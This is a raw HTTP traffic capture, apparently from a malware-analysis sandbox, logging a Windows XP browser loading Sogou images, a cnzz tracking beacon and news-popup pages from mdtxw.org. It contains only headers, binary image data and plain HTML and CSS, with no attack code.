Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com.
...C..................................................................
..C...................................................................
....=._...............................................................
}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUV
WXYZcdefghijstuvwxyz..................................................
......................................................................
......w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFG
HIJSTUVWXYZcdefghijstuvwxyz...........................................
.........................................?..........|f...Yl..;av...zW.
...KC.....}..W.?.........'.....GN.".....VF..Xdn.\.L......|......=.7~/~
.../...Z..w...m....,..]...\|....?..Z.......z..T...<....Q_.s.o......
N.<7u..nSEW......o>....`14....WU-m...T o........_....M.mm.>.|
.S~.....bl<g?.Q].]Y........kH..J...M0.../7f.....k.x..k..o.........5
.g.l.K.e~|....q.*.Silz.xmr.....>7...&.&7.q..Y.....<.q....r...I.W
......N...;.a.W.........T...X...5..C..mc#/>..X...Mr....7........^..
.|......:...'.}.M.h.....:Ao.....aq...-f....!Qsy3.yF>.?i*o.u..~=..._
...M........Vo.0.h...P.*..P..v4..Pv.O..$...P....v......~L*[email protected]
.ot...C.:....2n...dsz..t...:.n.^x.i.6.70HQ.....G .V..*.i..]:..U..(..M9
qo.n<D.`{.Z7s..........-...-..!.P.g$....k....p4...;[email protected]
..>.....mkK. 2..tRF......_.[.....$....<<).*.H..h..''.........
. ..v..-n.ll<s...d.V..mB......I...Y.S..../....?.__4y..SW..>h<<< skipped >>>

GET /imgn/123ie/search_arrow.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p7.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 447

Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89a................$..................O...........FC...............
QRR...{......{z.......m..li......fff......B...... %.<3.......l2.o.e
l......8.nWz{{58=.J....#r.T.....'....r|......Z.x4....&&'S.z...........
...3......YQ.............El..d,...4?......e...W...e.R}.....v....-.....
.... *.f...vQ...9.h..............b....s..r.....M.{dY.x.....F.IJw..j...
.l...)p]_..6.R...Xeqy2AvcY."y....i.....f..........!.....~.,...........
.~..............x.....x......;..

GET /imgn/123ie/setting_icon.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p6.123.sogoucdn.com

Connection: Keep-Alive

GET /imgn/123ie/setting_icon.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p6.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:28 GMT

Content-Type: image/gif

Content-Length: 76

Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:28 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

GIF89a.............#.....!.......,.............".8....=h%v..n!.....y.h
.....;..

GET /stat.htm?id=5645354&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=0&sin=&t=undefinedundefinedundefinedundefinedundefined&rnd=2009664034 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs10.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Sun, 01 Jun 2014 03:33:50 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /img/news_photo/2014/05/28/i8g7XZO1lz1162.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: pic2.xcarimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Expires: Sun, 31 May 2015 16:33:04 GMT

Date: Sat, 31 May 2014 16:33:04 GMT

Server: Apache

Last-Modified: Wed, 28 May 2014 09:00:18 GMT

Cache-Control: max-age=31536000

Content-Type: image/jpeg

Content-Length: 4997

Accept-Ranges: bytes

Xcar-Cache-Server: imgcache2-HIT

Age: 1

X-Via: 1.1 zjjhdx41:8104 (Cdn Cache Server V2.0), 1.1 dls21:7 (Cdn Cache Server V2.0)

Connection: keep-alive
......Exif..II*.................Ducky.......<.....)hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-
c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xm
pMM:InstanceID="xmp.iid:633AAA3AE18C11E39608B049DDD009CF" xmpMM:Docume
ntID="xmp.did:633AAA3BE18C11E39608B049DDD009CF"> <xmpMM:DerivedF
rom stRef:instanceID="xmp.iid:633AAA38E18C11E39608B049DDD009CF" stRef:
documentID="xmp.did:633AAA39E18C11E39608B049DDD009CF"/> </rdf:De
scription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"
?>....Adobe.d......................................................
......................................................................
.....................U._...............................3.H...k.....Y..
Zn.j.:.....A.[......j.ei}$.l..X"..P.........2.....u4.`.^...341..o.Y.g.
.N7<@....Px.u.*.N.....JL?........u$....v5<.u.\U["..Ix.O1.....8T.
uz..F.Z)..V...8.v.c.Q..T.`.0...eg..\....`R........G.`.{yh.....Sc...h..
..-..V0.W0I#..[a.k.....|xi][email protected]@.Y....\.<.W.
..jbmK..............i.a....07T|i..ky.....*......9w.....2........Sy3[..
.A...m....[...Ip.....;.|u4...a..;.....V....4.6....uQ.Y..r..:GZ.j..<<< skipped >>>

GET /v53/imgn/foot_slider.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: image/jpeg

Content-Length: 322

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes

......JFIF.....H.H.....C..............................................
.........          ...C................                               
                  ....................................................
....................S.................................................
........?......>....('@......... . ..@........

GET /v53/imgn/guide_tip.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/png

Content-Length: 10442

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B
2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E3
88CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E30
40A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky.....
.f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<..
...........i......h-....@_~.. _&.2%...<..........k......w.d./.....U
 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l
.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.j
jj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.
rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3
......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=
p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.<<< skipped >>>

GET /miniindex/inc/stylemini.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 11323

Content-Type: text/css

Last-Modified: Thu, 10 Apr 2014 18:35:54 GMT

Accept-Ranges: bytes

ETag: "0a189b4eb54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:37 GMT
img{border:0}..#mini_wrap .bor_n {...border: 0px currentColor;..}..#mi
ni_wrap .none {...display: none;..}..#mini_wrap {.....}..#closehBtn {.
..background: url("close.png") no-repeat 0px 0px; padding: 0px; top: 0
px; width: 40px; height: 19px; color: rgb(11, 59, 140); font-size: 14p
x; vertical-align: 0px; position: relative;..}..#closehBtn:hover {...b
ackground: url("close.png") no-repeat -40px 0px;..}..#minBtn {...backg
round: url("min.png") no-repeat 0px 0px; padding: 0px; top: 0px; width
: 27px; height: 19px; color: rgb(11, 59, 140); font-size: 14px; vertic
al-align: 0px; position: relative;..}..#minBtn:hover {...background: u
rl("min.png") no-repeat -27px 0px;..}...wrapper {...margin: 0px auto; 
width: 698px; height: 399px; text-align: left;..}...normal_bg {...back
ground: url("normal_bg.png") no-repeat 0px 0px rgb(255, 255, 255);..}.
..body_bg {...position: relative;..}...header {...width: 698px; height
: 33px;..}...nav_box .refresh_box a {...background-image: url("ico_new
2.png"); background-repeat: no-repeat;..}...nav_box .on_bg {...backgro
und-image: url("ico_new2.png"); background-repeat: no-repeat;..}...nav
_box {...padding: 4px 0px 0px 10px; width: 688px;..}...nav_box span {.
..color: rgb(188, 202, 224); float: left;..}...nav_box a {...width: 45
px; height: 26px; text-align: center; color: rgb(11, 59, 140); padding
-top: 3px; font-size: 14px; text-decoration: none; display: inline-blo
ck; position: relative; _vertical-align: middle;..}...nav_box .on_bg {
...background-position: 0px -460px; left: 18px; width: 9px; height<<< skipped >>>

GET /miniindex/xinwen.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 7368

Content-Type: text/html

Last-Modified: Wed, 16 Apr 2014 14:44:27 GMT

Accept-Ranges: bytes

ETag: "5947395e8259cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<HTML xm
lns="hXXp://VVV.w3.org/1999/xhtml"><HEAD><META content="IE
=10.000" http-equiv="X-UA-Compatible">. ..<meta http-equiv="Cont
ent-Type" content="text/html; charset=gb2312">.. ..<meta name="r
obots" content="noindex, nofollow,nosnippet,noarchive,noodp">..<
title>......</title>..<link href="inc/style.css" rel="styl
esheet" type="text/css">.. ..<style type="text/css">..       
     * { padding:0px;..                margin:0px;..            }..   
         .roll-news {..                width:220px;..                h
eight:150px;..                border:solid 1px #c1c1c1;..             
   overflow:hidden;..            }..            .roll-news-index-hover
 {..                background-color:white !important;..            }.
.            .roll-news-image a img {..                width:220px;.. 
               height:150px;..            }..            .roll-news-in
dex {..                position:relative;..                top:-22px;.
.                float:right;..                width: 60px;..         
   }..            .roll-news-index li {..                list-style:no
ne;..                float:left;..                font-size:12px;..   
             font-weight:600;..                width:8px;..           
     height:16px;..                line-height:16px;..                
cursor:pointer;..                margin:0 3px 0 0;..              <<< skipped >>>

GET /miniindex/shehui_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 12927

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:16 GMT

Accept-Ranges: bytes

ETag: "0263cdbd057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/jiankang_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 13037

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:30 GMT

Accept-Ranges: bytes

ETag: "06194e3d057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:40 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/xinwen.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 7368

Content-Type: text/html

Last-Modified: Wed, 16 Apr 2014 14:44:27 GMT

Accept-Ranges: bytes

ETag: "5947395e8259cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:41 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<HTML xm
lns="hXXp://VVV.w3.org/1999/xhtml"><HEAD><META content="IE
=10.000" http-equiv="X-UA-Compatible">. ..<meta http-equiv="Cont
ent-Type" content="text/html; charset=gb2312">.. ..<meta name="r
obots" content="noindex, nofollow,nosnippet,noarchive,noodp">..<
title>......</title>..<link href="inc/style.css" rel="styl
esheet" type="text/css">.. ..<style type="text/css">..       
     * { padding:0px;..                margin:0px;..            }..   
         .roll-news {..                width:220px;..                h
eight:150px;..                border:solid 1px #c1c1c1;..             
   overflow:hidden;..            }..            .roll-news-index-hover
 {..                background-color:white !important;..            }.
.            .roll-news-image a img {..                width:220px;.. 
               height:150px;..            }..            .roll-news-in
dex {..                position:relative;..                top:-22px;.
.                float:right;..                width: 60px;..         
   }..            .roll-news-index li {..                list-style:no
ne;..                float:left;..                font-size:12px;..   
             font-weight:600;..                width:8px;..           
     height:16px;..                line-height:16px;..                
cursor:pointer;..                margin:0 3px 0 0;..              <<< skipped >>>

GET /miniindex/lieqi_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 13149

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:34 GMT

Accept-Ranges: bytes

ETag: "0bbf6e5d057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:41 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/shehui_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 12927

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:16 GMT

Accept-Ranges: bytes

ETag: "0263cdbd057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/jiankang_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 13037

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:30 GMT

Accept-Ranges: bytes

ETag: "06194e3d057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/meinv.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 6471

Content-Type: text/html

